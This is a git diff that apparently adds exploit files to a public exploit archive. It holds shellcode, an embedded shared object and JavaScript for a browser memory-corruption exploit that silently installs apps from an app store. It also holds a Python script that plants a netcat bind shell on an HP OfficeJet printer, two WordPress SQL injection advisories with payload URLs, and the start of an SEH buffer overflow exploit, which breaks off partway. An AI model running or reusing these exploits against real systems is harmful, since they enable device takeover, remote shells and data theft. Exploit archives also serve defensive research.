0xe3,0xd5,0xe1,0x25,0x10,0xa0,0xe3,0x2c,0x30,0xa0,0xe3,0xa9,0x20,0xcd,0xe5,0x00,0xb0,0xa0,0xe1,0x02,0x00,0xa0,0xe3,0xa8,0x10,0xcd,0xe5,0x0c,0xc0,0x85,0xe0,0xab,0x10,0xcd,0xe5,0x0e,0xe1,0x8e,0xe0,0xae,0x10,0xcd,0xe5,0x02,0x10,0x8d,0xe0,0x20,0xc0,0x8d,0xe5,0x20,0xc0,0x95,0xe5,0xac,0x20,0xcd,0xe5,0xaf,0x20,0xcd,0xe5,0xa8,0x20,0x8d,0xe2,0xaa,0x30,0xcd,0xe5,0x8e,0xe1,0x8c,0xe0,0xad,0x30,0xcd,0xe5,0x05,0x30,0xa0,0xe1,0x05,0xc0,0x8e,0xe0,0x10,0xe0,0x9c,0xe5,0x00,0xc0,0x8d,0xe5,0x0e,0xc0,0x85,0xe0,0x24,0xc0,0x8d,0xe5,0x04,0xc0,0x8d,0xe5,0x14,0xc0,0x9d,0xe5,0x3c,0xff,0x2f,0xe1,0x73,0xe0,0xa0,0xe3,0x6d,0x00,0xa0,0xe3,0x89,0xa0,0xcd,0xe5,0x67,0xc0,0xa0,0xe3,0x2e,0x30,0xa0,0xe3,0x91,0xa0,0xcd,0xe5,0x79,0x20,0xa0,0xe3,0x65,0x10,0xa0,0xe3,0x8c,0xe0,0xcd,0xe5,0x8e,0x00,0xcd,0xe5,0x6c,0x00,0xa0,0xe3,0x94,0xe0,0xcd,0xe5,0x6f,0xe0,0xa0,0xe3,0x51,0xc0,0xcd,0xe5,0x70,0xc0,0xa0,0xe3,0x96,0x60,0xcd,0xe5,0x52,0xe0,0xcd,0xe5,0x5f,0xe0,0xa0,0xe3,0xb5,0x60,0xcd,0xe5,0xb7,0x00,0xcd,0xe5,0xb9,0xc0,0xcd,0xe5,0x69,0xc0,0xa0,0xe3,0xba,0x00,0xcd,0xe5,0xc1,0x60,0xcd,0xe5,0x8b,0x80,0xcd,0xe5,0x8f,0x90,0xcd,0xe5,0x93,0x80,0xcd,0xe5,0x95,0x70,0xcd,0xe5,0x97,0x90,0xcd,0xe5,0x53,0x70,0xcd,0xe5,0x54,0x90,0xcd,0xe5,0xbb,0x70,0xcd,0xe5,0xbc,0x90,0xcd,0xe5,0x88,0x30,0xcd,0xe5,0x90,0x30,0xcd,0xe5,0x50,0x30,0xcd,0xe5,0xb4,0x30,0xcd,0xe5,0xb8,0x30,0xcd,0xe5,0xc0,0x30,0xcd,0xe5,0x8a,0x20,0xcd,0xe5,0x8d,0x20,0xcd,0xe5,0x92,0x20,0xcd,0xe5,0xb6,0x10,0xcd,0xe5,0xc2,0x10,0xcd,0xe5,0xc3,0x00,0xcd,0xe5,0xb0,0x03,0xd5,0xe1,0xd1,0xe0,0xcd,0xe5,0x61,0xe0,0xa0,0xe3,0xc5,0xa0,0xcd,0xe5,0xd3,0x60,0xcd,0xe5,0xd4,0x60,0xcd,0xe5,0x09,0x00,0x50,0xe1,0xd9,0xa0,0xcd,0xe5,0x6c,0xa0,0xa0,0xe3,0xde,0x60,0xcd,0xe5,0xe2,0x60,0xcd,0xe5,0x6f,0x60,0xa0,0xe3,0xc4,0x30,0xcd,0xe5,0xc6,0x20,0xcd,0xe5,0xc7,0x80,0xcd,0xe5,0xc8,0x90,0xcd,0xe5,0xcc,0x30,0xcd,0xe5,0xcd,0xc0,0xcd,0xe5,0xce,0x80,0xcd,0xe5,0xcf,0xc0,0xcd,0xe5,0xd0,0x70,0xcd,0xe5,0xd2,0xe0,0xcd,0xe5,0xd5,0xe0,0xcd,0xe5,0xd6,0x20,0xcd,0xe5,0xd7,0x90,0xcd,0xe5,0xd8,0x30,0xcd,0xe5,0xda,0xe0,0xcd,0xe5,0xdb,0x70,0xcd,0xe5,0xdc,0xe0,0xcd,0xe5,0xdd,0x30,0xcd,0xe5,0xdf,0x10,0xcd,0xe5,0xe0,0xa0,0xcd,0xe5,0xe1,0x30,0xcd,0xe5,0xe3,0x60,0xcd,0xe5,0xe4,0x90,0xcd,0xe5,0xa6,0x00,0x00,0x0a,0xcc,0xa0,0x8d,0xe2,0xd8,0x60,0x8d,0xe2,0x20,0x70,0x9d,0xe5,0x88,0x20,0x8d,0xe2,0x90,0x30,0x8d,0xe2,0x20,0x90,0x8d,0xe5,0x2c,0x90,0x8d,0xe5,0x09,0x80,0xa0,0xe1,0x50,0x00,0x8d,0xe2,0xb4,0xc0,0x8d,0xe2,0xc0,0xe0,0x8d,0xe2,0x40,0xa0,0x8d,0xe5,0x48,0x60,0x8d,0xe5,0x03,0xa0,0xa0,0xe1,0x24,0x60,0x9d,0xe5,0x44,0x90,0x8d,0xe5,0x24,0x90,0x8d,0xe5,0x02,0x90,0xa0,0xe1,0x14,0x00,0x8d,0xe5,0x28,0xc0,0x8d,0xe5,0x3c,0xe0,0x8d,0xe5,0x4c,0x40,0x8d,0xe5,0x00,0x40,0x97,0xe5,0x09,0x10,0xa0,0xe1,0x04,0x40,0x86,0xe0,0x04,0x00,0xa0,0xe1,0x3b,0xff,0x2f,0xe1,0x00,0x00,0x50,0xe3,0x24,0x70,0x8d,0x05,0x1e,0x00,0x00,0x0a,0x04,0x00,0xa0,0xe1,0x0a,0x10,0xa0,0xe1,0x3b,0xff,0x2f,0xe1,0x00,0x00,0x50,0xe3,0x2c,0x70,0x8d,0x05,0x18,0x00,0x00,0x0a,0x04,0x00,0xa0,0xe1,0x50,0x10,0x8d,0xe2,0x3b,0xff,0x2f,0xe1,0x00,0x00,0x50,0xe3,0x13,0x00,0x00,0x0a,0x04,0x00,0xa0,0xe1,0xb4,0x10,0x8d,0xe2,0x3b,0xff,0x2f,0xe1,0x00,0x00,0x50,0xe3,0x20,0x70,0x8d,0x05,0x0d,0x00,0x00,0x0a,0x04,0x00,0xa0,0xe1,0xc0,0x10,0x8d,0xe2,0x3b,0xff,0x2f,0xe1,0x00,0x00,0x50,0xe3,0x44,0x70,0x8d,0x05,0x07,0x00,0x00,0x0a,0x04,0x00,0xa0,0xe1,0xcc,0x10,0x8d,0xe2,0x3b,0xff,0x2f,0xe1,0x00,0x00,0x50,0xe3,0x02,0x00,0x00,0x0a,0x04,0x00,0xa0,0xe1,0xd8,0x10,0x8d,0xe2,0x3b,0xff,0x2f,0xe1,0xb0,0x13,0xd5,0xe1,0x01,0x80,0x88,0xe2,0x28,0x70,0x87,0xe2,0x01,0x00,0x58,0xe1,0xd3,0xff,0xff,0xba,0x4c,0x40,0x9d,0xe5,0x44,0x90,0x9d,0xe5,0x24,0xa0,0x9d,0xe5,0x20,0x20,0x9d,0xe5,0x2c,0x30,0x9d,0xe5,0x20,0xc0,0x9d,0xe5,0x14,0xe0,0x92,0xe5,0x10,0x10,0x93,0xe5,0x10,0x30,0x9a,0xe5,0x10,0x60,0x9c,0xe5,0xae,0x21,0xb0,0xe1,0x01,0x70,0x85,0xe0,0x03,0xe0,0x85,0xe0,0x06,0x60,0x85,0xe0,0x1b,0x00,0x00,0x0a,0x00,0x80,0xa0,0xe3,0x24,0xb0,0x8d,0xe5,0x1c,0xb0,0x9d,0xe5,0x1c,0x90,0x8d,0xe5,0x08,0x90,0xa0,0xe1,0x20,0x80,0x9d,0xe5,0x20,0xa0,0x8d,0xe5,0x06,0xa0,0xa0,0xe1,0x0e,0x60,0xa0,0xe1,0x14,0x50,0x8d,0xe5,0x04,0x20,0x9a,0xe5,0x01,0x90,0x89,0xe2,0x08,0xa0,0x8a,0xe2,0x08,0x50,0x1a,0xe5,0x10,0x00,0x9d,0xe5,0x52,0xe4,0xef,0xe7,0x0e,0x12,0x96,0xe7,0x01,0x10,0x87,0xe0,0x3b,0xff,0x2f,0xe1,0x05,0x00,0x84,0xe7,0x14,0x30,0x98,0xe5,0xa3,0x01,0x59,0xe1,0xf2,0xff,0xff,0x3a,0x14,0x50,0x9d,0xe5,0x06,0xe0,0xa0,0xe1,0x24,0xb0,0x9d,0xe5,0x1c,0x90,0x9d,0xe5,0x20,0xa0,0x9d,0xe5,0x14,0xc0,0x99,0xe5,0x10,0x20,0x99,0xe5,0xac,0x11,0xb0,0xe1,0x00,0x10,0xa0,0x13,0x02,0x50,0x85,0xe0,0x01,0x00,0xa0,0x11,0x0c,0x00,0x00,0x0a,0x01,0x30,0xa0,0xe1,0x01,0x00,0x80,0xe2,0x05,0xc0,0xb3,0xe7,0x08,0x10,0x81,0xe2,0x04,0x20,0x93,0xe5,0x52,0x34,0xef,0xe7,0x03,0x22,0x8e,0xe0,0x04,0x30,0x92,0xe5,0x04,0x20,0x83,0xe0,0x04,0x20,0x8c,0xe7,0x14,0xc0,0x99,0xe5,0xac,0x01,0x50,0xe1,0xf2,0xff,0xff,0x3a,0x14,0x00,0x9a,0xe5,0x2b,0x1b,0x9f,0xed,0x20,0x22,0xb0,0xe1,0x20,0x1b,0x8d,0xed,0x0e,0x80,0xa0,0x11,0x00,0x60,0xa0,0x13,0x80,0x50,0x8d,0x12,0x04,0x00,0x00,0x1a,0x0d,0x00,0x00,0xea,0x14,0x90,0x9a,0xe5,0x10,0x80,0x88,0xe2,0x29,0x02,0x56,0xe1,0x09,0x00,0x00,0x2a,0x00,0xe0,0x98,0xe5,0x05,0x10,0xa0,0xe1,0x01,0x60,0x86,0xe2,0x0e,0x00,0x87,0xe0,0x3b,0xff,0x2f,0xe1,0x00,0x00,0x50,0xe3,0xf4,0xff,0xff,0x1a,0x04,0x70,0x98,0xe5,0x07,0x40,0x84,0xe0,0x01,0x00,0x00,0xea,0xcc,0x4c,0x0c,0xe3,0x14,0x48,0xdf,0xe7,0x18,0xb0,0x9d,0xe5,0x70,0x10,0x8d,0xe2,0xe8,0x20,0x8d,0xe2,0x30,0x50,0x9d,0xe5,0x02,0x00,0xa0,0xe3,0x0c,0xa0,0x9b,0xe5,0x08,0x30,0x9b,0xe5,0x00,0xa0,0x8d,0xe5,0x35,0xff,0x2f,0xe1,0x18,0x00,0x9d,0xe5,0x34,0xff,0x2f,0xe1,0x4b,0xdf,0x8d,0xe2,0xf0,0x8f,0xbd,0xe8,0x00,0x90,0xa0,0xe1,0x20,0x00,0x8d,0xe5,0x00,0xa0,0xa0,0xe1,0x2c,0x00,0x8d,0xe5,0x00,0x20,0xa0,0xe1,0x00,0x30,0xa0,0xe1,0x98,0xff,0xff,0xea,0x00,0xf0,0x20,0xe3,0x73,0x6f,0x5f,0x6d,0x61,0x69,0x6e,0x00,];
+var so_str = "7f454c460101010000000000000000000300280001000000000000003400000044110000000000053400200008002800150014000600000034000000340000003400000000010000000100000400000004000000030000003401000034010000340100001300000013000000040000000100000001000000000000000000000000000000d80d0000d80d0000050000000010000001000000a40e0000a41e0000a41e00006c01000082010000060000000010000002000000a80e0000a81e0000a81e00002801000028010000060000000400000051e574640000000000000000000000000000000000000000060000000000000001000070d40c0000d40c0000d40c00002000000020000000040000000400000052e57464a40e0000a41e0000a41e00005c0100005c01000006000000040000002f73797374656d2f62696e2f6c696e6b657200000000000000000000000000000000000001000000000000000000000012000000100000000000000000000000120000001d00000000000000000000001200000034000000000000000000000012000000480000000000000000000000120000004f000000000000000000000012000000560000000000000000000000120000005d000000a00800003404000012000800650000000000000000000000120000006e0000000000000000000000120000007f0000000000000000000000110000009100000010200000000000001000f1ff9800000010200000000000001000f1ffa400000026200000000000001000f1ff005f5f6378615f66696e616c697a65005f5f6378615f617465786974005f5f61656162695f756e77696e645f6370705f707230005f5f616e64726f69645f6c6f675f7072696e74006d616c6c6f63006d656d736574006d656d63707900736f5f6d61696e006d70726f74656374005f5f737461636b5f63686b5f6661696c005f5f737461636b5f63686b5f6775617264005f6564617461005f5f6273735f7374617274005f656e64006c6962632e736f006c69626d2e736f006c6962737464632b2b2e736f006c69626d656469616e646b2e736f006c69627574696c732e736f006c696262696e6465722e736f006c69626d656469612e736f006c696273746167656672696768742e736f006c696273746167656672696768745f666f756e646174696f6e2e736f006c6962637574696c732e736f006c6962696e7075742e736f006c6962646c2e736f006c6962616e64726f69645f72756e74696d652e736f0072636532757873732e736f00000000030000000f0000000c0000000e0000000d0000000000000000000000000000000200000001000000040000000000000006000000050000000800000007000000030000000a000000090000000b000000a41e0000170000000020000017000000d01f0000150b0000e01f000016010000e41f000016020000e81f000016040000ec1f000016050000f01f000016060000f41f000016070000f81f000016090000fc1f0000160a000004e02de504e09fe50ee08fe008f0bee5741b000000c68fe201ca8ce274fbbce500c68fe201ca8ce26cfbbce500c68fe201ca8ce264fbbce500c68fe201ca8ce25cfbbce500c68fe201ca8ce254fbbce500c68fe201ca8ce24cfbbce500c68fe201ca8ce244fbbce500c68fe201ca8ce23cfbbce500482de904b08de20c309fe503308fe00300a0e1e1ffffeb0088bde8281b000000482de904b08de208d04de208000be508301be5000053e30100000a08301be533ff2fe104d04be20088bde800482de904b08de208d04de208000be528309fe503308fe00300a0e108101be51c309fe503308fe00320a0e1cbffffeb0030a0e10300a0e104d04be20088bde8b8ffffffc41a000020d04de20c008de508108de504208de500308de50030a0e31730cde50030a0e318308de5210000ea0030a0e31c308de50030a0e31c308de50f0000ea18209de51c309de5033082e004209de5033082e00020d3e50c109de51c309de5033081e00030d3e5030052e10000000a060000ea1c309de5013083e21c308de51c209de508309de5030052e1ebffff3a1c209de508309de5030052e10100001a18309de5090000ea18309de5013083e218308de518209de508309de5032082e000309de5030052e1d7ffff9a0030e0e30300a0e120d08de21eff2fe104e02de524d04de20c008de508108de514329fe503308fe0003093e50320a0e108329fe503308fe002c0a0e10700b3e800008ce504108ce508208ce5f0319fe503308fe00030d3e5013023e27330efe6000053e36900000ad8319fe503308fe00120a0e30020c3e508309de500308de50600a0e3c0319fe503308fe00310a0e1b8319fe503308fe00320a0e10c309de56dffffeb08309de5003093e510308de510309de5043083e2003093e514308de510309de50c3083e218308de518309de500308de50600a0e374319fe503308fe00310a0e16c319fe503308fe00320a0e114309de558ffffeb5c319fe503308fe0002093e514309de5033082e00300a0e154ffffeb0030a0e11c308de53c319fe503308fe0002093e514309de5033082e01c009de50010a0e30320a0e14cffffeb10309de51c009de50310a0e10c20a0e34affffeb1c309de50c1083e200319fe503308fe0002093e5f8309fe503308fe0003093e50100a0e10210a0e10320a0e13effffebe0309fe503308fe0003093e50c3083e21c209de5032082e018309de50200a0e10310a0e114209de533ffffeb1c309de5043083e2b0209fe502208fe0001092e514209de5022081e0002083e51c309de5043083e2003093e51c209de50c2082e200208de50600a0e380209fe502208fe00210a0e178209fe502208fe015ffffeb08309de51c209de5002083e564309fe503308fe0003093e5013083e20c009de508109de533ff2fe10030a0e10300a0e124d08de204f09de4d4190000a8190000ac190000901900004406000040060000f005000008060000f8180000d418000090180000881800006c18000038180000dc040000f4040000d817000010402de928d04de20c008de570439fe504408fe06c339fe5033094e7003093e524308de560339fe503308fe00030d3e5013023e27330efe6000053e3c700000a48339fe503308fe00120a0e30020c3e50600a0e338339fe503308fe00310a0e130339fe503308fe00320a0e10c309de5d9feffeb0c309de5003093e514308de50600a0e310339fe503308fe00310a0e108339fe503308fe00320a0e114309de5cdfeffeb0c309de5183083e2003093e50320a0e1e8329fe503308fe0002083e50c309de51c3083e2002093e5d4329fe503308fe0002083e5cc329fe503308fe0003093e5c4229fe502208fe0001092e5bc229fe502208fe0002092e500108de504208de50600a0e3a8229fe502208fe00210a0e1a0229fe502208fe0aefeffeb98229fe502208fe01c308de2000092e5041092e50300a3e814309de580229fe502208fe00200a0e10c10a0e30320a0e180330ce3c93140e3d6feffeb18008de518209de514309de5032082e054329fe503308fe0002083e54c329fe503308fe0003093e50c3083e2012083e23c329fe503308fe0002083e534329fe503308fe0003093e50600a0e328229fe502208fe00210a0e120229fe502208fe086feffeb18309de5010073e36400000a010aa0e384feffeb0030a0e10320a0e1fc319fe503308fe0002083e5f4319fe503308fe0003093e50600a0e3e8219fe502208fe00210a0e1e0219fe502208fe072feffebd8319fe503308fe0003093e5ff3ec3e30f30c3e30300a0e1021aa0e30720a0e375feffebb8319fe503308fe0003093e5ff3ec3e30f30c3e30300a0e1021aa0e30720a0e36cfeffeb98319fe503308fe0002093e590319fe503308fe002c0a0e10700b3e800008ce504108ce508208ce578319fe503308fe0003093e50c2083e2df380fe300304fe3003082e560319fe503308fe0002093e51030a0e3033082e050219fe502208fe0002092e5002083e50600a0e340319fe503308fe00310a0e138319fe503308fe00320a0e130319fe503308fe03cfeffeb0600a0e324319fe503308fe00310a0e11c319fe503308fe00320a0e134feffeb10319fe503308fe0003093e50320a0e1df380fe300304fe3003082e5f8309fe503308fe0003093e5043083e2ec209fe502208fe0002083e50600a0e3e0309fe503308fe00310a0e1d8309fe503308fe00320a0e11efeffeb20309fe5033094e724209de5003093e5030052e10000000a26feffeb28d08de21080bde81c170000fcffffff5517000039170000f40300001c040000c403000008040000b8160000a416000098160000881600007c160000400300009c030000040400001c16000008160000fc150000d8150000dc150000a0020000100300008c1500008015000050020000dc020000581500004015000010150000f4140000e8140000cc140000b41400008401000020020000a8faffff5c010000140200006c1400005014000050faffff04010000c801000084f8ff7fb0b0078054f9ff7f00840880bcfbff7fb0a80980e8ffff7f010000006578706c6f697400746869732069732025782c736f75726365436f6465206174202578006c656e2069732025642c25730000000061727261792062756666657220616464726573732061742025780000646c6f70656e206164647265737320617420257800000000737472696e672069732025642c25702c2573000066696e6420636f6d70696c652066756e6374696f6e20617420257800636f6465736e6970742061742025700066616b655f646f4578656375746553637269707420617420257000006265666f726520686f6f6b00616674657220686f6f6b00000302010204050607000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000c404000003000000d41f000002000000400000001700000010040000140000001100000011000000f803000012000000180000001300000008000000faffff6f0200000006000000480100000b0000001000000005000000380200000a0000006d01000004000000a803000001000000a900000001000000b100000001000000b900000001000000c600000001000000d500000001000000e100000001000000ee00000001000000fa000000010000000c010000010000002901000001000000360100000100000042010000010000004b0100000e000000610100001a000000a41e00001c000000040000001e00000008000000fbffff6f01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000005004000050040000500400005004000050040000500400005004000050040000002000002de9f04f0746a1b008468846004743433a2028474e552920342e3800040000000900000004000000474e5500676f6c6420312e3131000000413d00000061656162690001330000000541524d20763700060a0741080109020a030c011102120414011501170318011a021b031e0622012a012c02440372636532757873732e736f0064b3a5da002e7368737472746162002e696e74657270002e64796e73796d002e64796e737472002e68617368002e72656c2e64796e002e72656c2e706c74002e74657874002e41524d2e6578696478002e726f64617461002e66696e695f6172726179002e64796e616d6963002e676f74002e64617461002e627373002e636f6d6d656e74002e6e6f74652e676e752e676f6c642d76657273696f6e002e41524d2e61747472696275746573002e676e755f64656275676c696e6b000000000000000000000000000000000000000000000000000000000000000000000000000000000000000b000000010000000200000034010000340100001300000000000000000000000100000000000000130000000b000000020000004801000048010000f0000000030000000100000004000000100000001b000000030000000200000038020000380200006d01000000000000000000000100000000000000230000000500000002000000a8030000a80300005000000002000000000000000400000004000000290000000900000002000000f8030000f8030000180000000200000000000000040000000800000032000000090000000200000010040000100400004000000002000000070000000400000008000000360000000100000006000000500400005004000074000000000000000000000004000000000000003b0000000100000006000000c4040000c40400001008000000000000000000000400000000000000410000000100007082000000d40c0000d40c000020000000080000000000000004000000080000004c0000000100000002000000f40c0000f40c0000e400000000000000000000000400000000000000540000000f00000003000000a41e0000a40e00000400000000000000000000000400000000000000600000000600000003000000a81e0000a80e00002801000003000000000000000400000008000000690000000100000003000000d01f0000d00f000030000000000000000000000004000000000000006e000000010000000300000000200000001000001000000000000000000000000400000000000000740000000800000003000000102000001010000016000000000000000000000004000000000000007900000001000000300000000000000010100000100000000000000000000000010000000100000082000000070000000000000000000000201000001c00000000000000000000000400000000000000990000000300007000000000000000003c1000003e00000000000000000000000100000000000000a90000000100000000000000000000007a1000001000000000000000000000000100000000000000010000000300000000000000000000008a100000b800000000000000000000000100000000000000";
+var arrayBuffer = new ArrayBuffer(0x1000000);
+var arrayBufferAddress = getObjAddr(arrayBuffer)-1;
+var backingStoreAddress = read_uint32(arrayBufferAddress+4*4);
+var args_address = backingStoreAddress+1024;
+function write_shellcode(dlsym_addr,buffer){
+    //ldr r0,[pc,4]//0xe59f0004 
+    //ldr r1,[pc,4]//0xe59f1004
+    //b shellcode;//0xea000001
+    //dlopen_addr//array_buffer_address
+    //dlsym_addr
+    //shellcode
+    //var stub=[0xe59f0004,0xe59f1004,0xea000001,dlsym_addr+0xc,dlsym_addr];
+    var stub=[0xe59f0004,0xe59f1004,0xea000001,args_address,0x1000000];
+    for(var i=0;i<stub.length;i++){
+        globaldv[buffer/4+i]=stub[i];
+    }
+
+    shellcode = shellcode.concat([0,0,0,0]);
+    for(var i=0;i<shellcode.length/4>>>0;i++){
+       // u8arr[i+4*stub.length]=shellcode[i];
+        globaldv[buffer/4+stub.length+i] = (shellcode[4*i+3]<<24)+(shellcode[4*i+2]<<16)+(shellcode[4*i+1]<<8)+(shellcode[4*i]);
+    }
+    return stub.length*4+shellcode.length;
+}
+
+function xss_code(){
+    //alert(navigator.userAgent);
+    //alert(document.cookie);
+    var i1=setInterval(function(){
+        if(!(document&&document.body&&document.body.innerHTML&&document.body.innerHTML.match(/This app is compatible/)!=null)){
+            console.log("wait load complete");
+            return;
+        }
+        clearInterval(i1);
+        var i2=setInterval(function(){
+            document.getElementsByClassName("price buy id-track-click")[0].click();
+            var installButton =  document.getElementById("purchase-ok-button");
+            if(installButton == null)
+                return;
+            installButton.click();
+            document.write("<h1>The app will be installed shortly, Pwned by 360 Alpha Team</h1>");
+            clearInterval(i2);
+            setTimeout(function(){
+            window.open("intent://scan/#Intent;scheme=zxing;package=com.google.zxing.client.android;end");
+            },26000);
+        },500);
+    },500);
+}
+
+var js_str="\n"+xss_code.toString()+"xss_code();\n";
+//var backup_arr = backup_original_code(huge_func_code_entry);
+var writed_len = write_shellcode(dlsym_addr,huge_func_code_entry);
+var args_view = new DataView(arrayBuffer,1024,100);
+var so_file_view = new DataView(arrayBuffer,4096);
+var js_view = new DataView(arrayBuffer,0x100000);
+args_view.setUint32(0,dlsym_addr+0xc,true);
+args_view.setUint32(4,dlsym_addr,true);
+args_view.setUint32(8,huge_func_code_entry,true);
+args_view.setUint32(12,writed_len,true);
+args_view.setUint32(16,backingStoreAddress+4096,true);
+args_view.setUint32(20,so_str.length/2,true);
+args_view.setUint32(24,backingStoreAddress+0x100000,true);
+args_view.setUint32(28,js_str.length,true);
+print("length is "+so_str.length);
+for(var i=0;i<so_str.length;i+=2){
+    var value = so_str.substr(i,2);
+    value = "0x"+value;
+    so_file_view.setUint8(i/2,parseInt(value));
+}
+for(var i=0;i<js_str.length;i++){
+    js_view.setUint8(i,js_str.charCodeAt(i));
+}
+
+print("begin execute shellcode");
+huge_func({});
+
+print("done");
+postMessage(true);
+//prevent arrayBuffer to be released
+while(1){}
+
+}
+//main world
+function print(){
+    console.log.apply(null,arguments);
+    document.write('<p >');
+    document.write.apply(document,arguments);
+    document.write("<p>");
+}
+
+// Build a worker from an anonymous function body
+var blobURL = URL.createObjectURL( new Blob([ '(',exploit.toString(),')()' ], { type: 'application/javascript' } ) );
+
+var worker;
+var exploitSucc = false;
+var count = 0;
+function startExploit(){
+    print("worker thread is started");
+    worker = new Worker( blobURL );
+    count++;
+    worker.onmessage = function(e){
+        print("exploit result is "+e.data);
+        exploitSucc = e.data;
+        if(exploitSucc==false){
+            startExploit();
+            return;
+        }
+        var end = +new Date();
+        print("time diff is "+(end-begin)/1000);
+        //top.location='https://play.google.com/store/apps/details?id=com.google.zxing.client.android';
+        top.location='https://play.google.com/store/apps/details?id=com.kitkats.qrscanner';
+    }
+}
+var begin = +new Date();
+startExploit();
+
+var savedCount = 0;
+var hangMonitor = setInterval(function (){
+    if(exploitSucc==true){
+        clearInterval(hangMonitor);
+    }else{
+        if(savedCount==count){//maybe hang
+            print("worker maybe hange");
+            worker.terminate();
+            startExploit();
+        }else{
+            print("worker is normal");
+            savedCount = count;
+        }
+    }
+},10000);
+//URL.revokeObjectURL( blobURL );
+
+
+</script>
+</html>
\ No newline at end of file
diff --git a/platforms/hardware/remote/42176.py b/platforms/hardware/remote/42176.py
new file mode 100755
index 000000000..6e00d496a
--- /dev/null
+++ b/platforms/hardware/remote/42176.py
@@ -0,0 +1,49 @@
+##
+# Create a bind shell on an unpatched OfficeJet 8210
+# Write a script to profile.d and reboot the device. When it comes
+# back online then nc to port 1270.
+#
+# easysnmp instructions:
+# sudo apt-get install libsnmp-dev
+# pip install easysnmp
+##
+
+import socket
+import sys
+from easysnmp import snmp_set
+
+profile_d_script = ('if [ ! -p /tmp/pwned ]; then\n'
+                    '\tmkfifo /tmp/pwned\n'
+                    '\tcat /tmp/pwned | /bin/sh 2>&1 | /usr/bin/nc -l 1270 > /tmp/pwned &\n
+                    'fi\n')
+
+if len(sys.argv) != 3:
+    print '\nUsage:upload.py [ip] [port]\n'
+    sys.exit()
+
+sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+sock.settimeout(2)
+server_address = (sys.argv[1], int(sys.argv[2]))
+print 'connecting to %s port %s' % server_address
+sock.connect(server_address)
+
+dir_query = '@PJL FSDOWNLOAD FORMAT:BINARY SIZE=' + str(len(profile_d_script)) + ' NAME="0:/../../rw/var/etc/profile.d/lol.sh"\r\n'
+dir_query += profile_d_script
+dir_query += '\x1b%-12345X'
+sock.sendall(dir_query)
+sock.close()
+
+sock1 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+sock1.connect(server_address)
+dir_query = '@PJL FSQUERY NAME="0:/../../rw/var/etc/profile.d/lol.sh"\r\n'
+sock1.sendall(dir_query)
+
+response = ''
+while True:
+    data = sock1.recv(1)
+    if '\n' == data: break
+    response += data
+
+print response
+snmp_set('.1.3.6.1.2.1.43.5.1.1.3.1', 4, 'integer', hostname='192.168.1.158', community='public', version=1)
+print 'Done! Try port 1270 in ~30 seconds'
\ No newline at end of file
diff --git a/platforms/php/webapps/42172.txt b/platforms/php/webapps/42172.txt
new file mode 100755
index 000000000..137abbfad
--- /dev/null
+++ b/platforms/php/webapps/42172.txt
@@ -0,0 +1,50 @@
+# Exploit Title: WordPress Plugin WP Jobs < 1.5 - SQL Injection
+# Date: 11-06-2017
+# Exploit Author: Dimitrios Tsagkarakis
+# Website: dtsa.eu 
+# Software Link: https://en-gb.wordpress.org/plugins/wp-jobs/
+# Vendor Homepage: http://www.intensewp.com/
+# Version: 1.4
+# CVE : CVE-2017-9603
+# Category: webapps
+
+ 
+
+1. Description:
+
+   
+
+SQL injection vulnerability in the WP Jobs plugin before 1.5 for WordPress
+allows authenticated users to execute arbitrary SQL commands via the jobid
+parameter to wp-admin/edit.php. 
+
+ 
+
+2. Proof of Concept:
+
+ 
+
+http://[wordpress_site]/wp-admin/edit.php?post_type=job&page=WPJobsJobApps&j
+obid=5 UNION ALL SELECT NULL,NULL,NULL,@@version,NULL,NULL-- comment
+
+ 
+
+3. Solution:
+
+   
+
+A new version of WP Jobs is available. Update the WordPress WP Jobs to the
+latest version.
+
+ 
+
+4. Reference:
+
+ 
+
+http://dtsa.eu/cve-2017-9603-wordpress-wp-jobs-v-1-4-sql-injection-sqli/
+
+http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2017-9603
+
+ 
+
diff --git a/platforms/php/webapps/42173.txt b/platforms/php/webapps/42173.txt
new file mode 100755
index 000000000..a8791100e
--- /dev/null
+++ b/platforms/php/webapps/42173.txt
@@ -0,0 +1,52 @@
+# Exploit Title: WordPress Plugin Event List <= 0.7.8 - SQL Injection
+# Date: 04-06-2017
+# Exploit Author: Dimitrios Tsagkarakis
+# Website: dtsa.eu 
+# Software Link: https://wordpress.org/plugins/event-list/
+# Version: 0.7.8
+# CVE : CVE-2017-9429
+# Category: webapps
+
+ 
+
+1. Description:
+
+   
+
+SQL injection vulnerability in the Event List plugin 0.7.8 for WordPress
+allows an authenticated user to execute arbitrary SQL commands via the id
+parameter to wp-admin/admin.php. 
+
+ 
+
+2. Proof of Concept:
+
+ 
+
+http://[wordpress_site]/wp-admin/admin.php?page=el_admin_main&action=edit&id
+=1 AND SLEEP(10)
+
+ 
+
+3. Solution:
+
+   
+
+The plugin has been removed from WordPress. Deactivate the plug-in and wait
+for a hotfix.
+
+ 
+
+4. Reference:
+
+ 
+
+http://dtsa.eu/cve-2017-9429-event-list-version-v-0-7-8-blind-based-sql-inje
+ction-sqli/
+
+http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2017-9429
+
+ 
+
+ 
+
diff --git a/platforms/windows/local/42174.py b/platforms/windows/local/42174.py
new file mode 100755
index 000000000..b88b4f828
--- /dev/null
+++ b/platforms/windows/local/42174.py
@@ -0,0 +1,59 @@
+#!/usr/bin/python
+
+###############################################################################
+# Exploit Title:        Easy MOV Converter 1.4.24 - 'Enter User Name' Field Buffer Overflow (SEH)
+# Date:                 13-06-2017
+# Exploit Author:       @abatchy17 -- www.abatchy.com
+# Vulnerable Software:  Easy MOV Converter 
+# Vendor Homepage:      http://www.divxtodvd.net/
+# Version:              1.4.24
+# Software Link:        http://www.divxtodvd.net/easy_mov_converter.exe
+# Tested On:            Windows 7 SP1 32bit
+#
+# Special thanks to @t_tot3s for pointing out how stupid I am. Credit to Muhann4d for discovering the PoC (41911).
+#
+# To reproduce the exploit:
+#	1. Click Register
+#	2. In the "Enter User Name" field, paste the content of exploit.txt
+#
+##############################################################################
+
+# If you're using WinXP SP3, change this to 996
+buffer = "\x41" * 1008
+
+nSEH = "\xeb\x10\x90\x90"
+
